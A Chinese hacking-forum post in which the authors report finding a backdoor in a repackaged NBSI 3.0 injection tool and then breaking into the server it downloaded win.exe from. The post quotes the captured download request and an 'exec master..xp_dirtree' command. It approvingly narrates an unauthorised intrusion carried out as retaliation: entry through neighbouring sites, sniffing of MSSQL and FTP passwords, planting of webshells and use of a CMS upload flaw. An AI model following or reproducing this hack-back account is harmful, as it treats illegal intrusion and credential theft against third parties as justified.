首先,BS一下放后门的人,事实上是谁捆了,我们几个人也已经该知道,也不想说了,他的人品大家都知道....
工具可以在黑鹰基地下载(http://www3.3800cc.com/Soft/gjgj/11115.html华北资源在线).下面的文章记录昨天我们(小刀,茶茶,小莫)反攻的全过程.
刚拿到工具那天我就开始抓包分析工具哪些变化,例如加了getwebshell功能.
抓包的时候,发现突然多了一条路径,向一个网站下载一个.exe文件,当时没在意,之后突然发现自己向外的
数据包很大,这个时候茶茶在群里说nbsi3.0有后门,于是几个人开始渗透过来.
数据包:
GET/mp3/win.exeHTTP/1.1
Accept:*/*
UA-CPU:x86
Accept-Encoding:gzip,deflate
User-Agent:Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.2;SV1;.NETCLR1.1.4322)
Host:www.6xwg.com
Connection:Keep-Alive
www.6xwg.com也就是nbsi后门转向的站点.
我们几个人分工,两个对网段进行扫描,另外两个对主机进行旁入.
旁入拿shell很容易就拿下,过程略,后来又在同网段下拿了台sa的肉鸡,
tracertwww.6xwg.com
直接返回IP说明可以嗅.
茶茶和刀刀两个负责嗅,而我继续旁入,服务器的权限配置BT,想通过旁注很难.
这时茶茶嗅到一堆dbo权限的mssql账号,还有一堆ftp账号和密码.
www.6xwg.com又开了1433,直接本地连接.
execmaster..xp_dirtree"d:/",1,1
从旁入的信息和分析得到路径,接着备份一个shell,但是备出来老出现%>无法毕合,又换备php小马.
但php小马又出现超时,再翻了翻他的路径,找到一个旧的动易程序,有上传漏洞,刚刚好上去.
接着到那个mp3目录下,发现了一堆网马,为了测试,我们配了一个pcshare,然后我们运行nbsi3.0
刀刀告诉我,我们几个全部上线了,之后,我通知了xiaolu,还有一些好友,还包括中标的人(查后门中标的人).接着做了这个证明动画.
好了,不多说了,具体怎么想大家自己去想吧,这里再次BS捆后门的人.
请使用过此工具的人注意,最好重做系统吧,不知道那个pc有没有做过免杀!!! 【